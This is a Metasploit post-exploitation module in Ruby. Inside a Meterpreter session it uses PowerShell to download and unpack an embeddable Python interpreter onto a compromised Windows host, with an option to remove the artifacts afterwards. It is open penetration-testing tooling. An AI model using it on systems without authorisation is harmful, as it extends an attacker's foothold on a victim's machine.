##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Powershell

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Install Python for Windows',
        'Description' => %q{
          This module places an embeddable Python3 distribution onto the target file system,
          granting pentesters access to a lightweight Python interpreter.
          This module does not require administrative privileges or user interaction with
          installation prompts.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Michael Long <bluesentinel[at]protonmail.com>'],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter'],
        'References'	=> [
          ['URL', 'https://docs.python.org/3/using/windows.html#windows-embeddable'],
          ['URL', 'https://attack.mitre.org/techniques/T1064/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        OptString.new('PYTHON_VERSION', [true, 'Python version to download', '3.8.2']),
        OptString.new('PYTHON_URL', [true, 'URL to Python distributions', 'https://www.python.org/ftp/python/']),
        OptString.new('FILE_PATH', [true, 'File path to store the python zip file; current directory by default', '.\\python-3.8.2-embed-win32.zip']),
        OptBool.new('CLEANUP', [false, 'Remove module artifacts; set to true when ready to cleanup', false])
      ]
    )
  end

  def run
    python_folder_path = File.basename(datastore['FILE_PATH'], File.extname(datastore['FILE_PATH']))
    python_exe_path = "#{python_folder_path}\\python.exe"
    python_url = "#{datastore['PYTHON_URL']}#{datastore['PYTHON_VERSION']}/python-#{datastore['PYTHON_VERSION']}-embed-win32.zip"

    # check if PowerShell is available
    psh_path = '\\WindowsPowerShell\\v1.0\\powershell.exe'
    unless file? "%WINDIR%\\System32#{psh_path}"
      fail_with(Failure::NotVulnerable, 'No powershell available.')
    end

    # Cleanup module artifacts
    if datastore['CLEANUP']
      print_status('Removing module artifacts')
      script = 'Stop-Process -Name "python" -Force; '
      script << "Remove-Item -Force #{datastore['FILE_PATH']}; "
      script << "Remove-Item -Force -Recurse #{python_folder_path}; "
      psh_exec(script)
      return
    end

    # download python embeddable zip file
    script = '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;'
    script << "Invoke-WebRequest -Uri #{python_url} -OutFile #{datastore['FILE_PATH']}; "
    print_status("Downloading Python embeddable zip from #{python_url}")
    psh_exec(script)

    # confirm python zip file is present
    unless file? datastore['FILE_PATH']
      fail_with(Failure::NotFound, "Failed to download #{datastore['PYTHON_URL']}")
    end

    # extract python embeddable zip file
    script = "Expand-Archive #{datastore['FILE_PATH']}; "
    print_status("Extracting Python zip file: #{datastore['FILE_PATH']}")
    psh_exec(script)

    # confirm python.exe is present
    unless file? python_exe_path
      fail_with(Failure::NotFound, python_exe_path)
    end

    # display location of python interpreter with example command
    print_status('Ready to execute Python; spawn a command shell and enter:')
    print_good("#{python_exe_path} -c \"print('Hello, world!')\"")
    print_warning('Avoid using this python.exe interactively, as it will likely hang your terminal; use script files or 1 liners instead')
  end
end